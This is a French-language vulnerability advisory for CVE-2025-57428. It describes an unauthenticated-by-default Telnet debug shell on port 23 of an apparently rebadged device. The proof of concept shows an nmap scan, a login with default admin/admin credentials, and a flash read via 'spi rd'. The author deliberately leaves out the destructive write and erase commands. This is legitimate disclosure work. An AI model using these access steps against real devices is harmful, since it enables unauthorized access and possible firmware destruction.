
CVE-2025-57428
⚠️ Ce dépôt est maintenu uniquement comme référence pour CVE-2025-57428.
Pour les autres avis et mises à jour, veuillez vous référer à : security-advisories.
Cet appareil expose une interface de débogage Telnet (activée par défaut sur le port 23) et accepte les identifiants admin (`admin`/`admin` par défaut). Après authentification, le shell fournit un accès direct à des commandes de bas niveau (notamment `spi` et `reg`), ce qui peut entraîner une corruption arbitraire du firmware, un brickage de l'appareil et une perte de fonctionnalité ou de configuration de sécurité.
Note : J'omets intentionnellement les commandes qui effectuent des écritures destructrices. La preuve de concept ci-dessous confirme l'existence et l'accessibilité de l'interface sans fournir un exploit prêt à l'emploi.
Scannez l'appareil sur le réseau local :
nmap -p 23 <device-ip>
Résultat : le port 23 (telnet) s'affiche comme open.
Connectez-vous via Telnet et authentifiez-vous (identifiants par défaut) :
telnet <device-ip>
# Login as: admin
# Password: admin
Après connexion, une invite de débogage est présentée CMD>.
Listez les commandes disponibles :
CMD>help
La sortie de l'aide affiche les menus suivants :
cfg net os
Entrez dans le menu os :
CMD>os
Listez à nouveau les commandes disponibles :
OS>help
Cette fois, la sortie de l'aide affiche les commandes suivantes :
thread mem spi reg cpuload cpubusy event
Observations :
Les tentatives pour trouver un contact de sécurité ou un canal de support du fournisseur d'origine ont échoué. Le produit semble être un appareil rebadgé d'origine inconnue.
Cette information est fournie à des fins éducatives et défensives uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive de cette information.
L'utilisation de spi affiche spi <rd/wr/er> <addr> [len].
Lisez la mémoire flash :
OS>spi rd 0x000fd0f0 16
Cela renvoie un dump hexadécimal de la région flash :
4f30650a 938f56fa 1b663a19 e316d824
Cela confirme que la commande fonctionne et que le shell a un accès bas niveau.
La commande d'écriture (spi wr) et la commande d'effacement (spi er), ainsi que les commandes reg, sont également exécutables.